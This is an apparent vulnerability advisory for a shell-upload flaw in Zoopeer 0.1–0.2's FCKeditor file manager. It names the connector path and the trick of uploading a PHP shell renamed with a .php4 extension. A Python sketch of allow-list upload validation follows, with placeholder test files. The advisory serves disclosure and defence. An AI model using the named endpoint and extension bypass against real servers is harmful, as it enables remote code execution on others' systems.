Vendor: Zoopeer
By: Net.Edit0r
CVSS: 7.5 (HIGH)
Shell Upload Vulnerability
CWE: 434
Product Name: Zoopeer
Affected Version From: 0.1
Affected Version To: 0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:zoopeer:zoopeer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Ubuntu 9.04
2010
Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability
Zoopeer 0.1 & 0.2 (fckeditor) is vulnerable to a shell upload vulnerability. The file browser page at fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php accepts a PHP file that has been renamed with the php4 extension (shell.php4), which allows an attacker to upload a malicious file to the server.
Mitigation:
Ensure that the application is configured to allow uploads only of files with the appropriate extensions and the appropriate content.
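The two checks named in the mitigation, as an added example that is not Zoopeer or FCKeditor code. It is written in Python to show the logic; the function names, the allowed types, and the deny-list it is contrasted with are all assumptions, and the stacked-extension and renaming steps go slightly beyond the php4 case described above.

```python
import os
import secrets

# Assumed policy for this sketch: extension -> bytes the content must start with.
ALLOWED = {
    "pdf": b"%PDF-",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Constructed deny-list, only to show why listing "bad" extensions fails.
DENIED = {"php", "phtml", "cgi", "pl"}


def denylist_accepts(filename):
    """Weak check: rejects only the extensions someone remembered to list."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext not in DENIED


def validate_upload(filename, content):
    """Return a server-chosen storage name, or None if the upload is rejected."""
    name = os.path.basename(filename.replace("\\", "/")).strip().rstrip(".")
    parts = name.lower().split(".")
    # Exactly one dot: rejects missing extensions, dotfiles and stacked
    # names such as report.php.pdf.
    if len(parts) != 2 or not parts[0]:
        return None
    magic = ALLOWED.get(parts[1])
    if magic is None or not content.startswith(magic):
        return None
    # The client-supplied stem is discarded; only the vetted extension is kept.
    return secrets.token_hex(16) + "." + parts[1]


if __name__ == "__main__":
    samples = [  # constructed inputs, not captured traffic
        ("shell.php4", b"<?php /* placeholder */ ?>"),
        ("report.pdf", b"%PDF-1.4\n"),
        ("report.php.pdf", b"%PDF-1.4\n"),
        ("photo.png", b"<?php /* placeholder */ ?>"),
    ]
    for fname, data in samples:
        print(fname, denylist_accepts(fname), validate_upload(fname, data))
```

Storing accepted files outside the web root, or in a directory where the server never hands files to an interpreter, limits the impact if a check is ever bypassed.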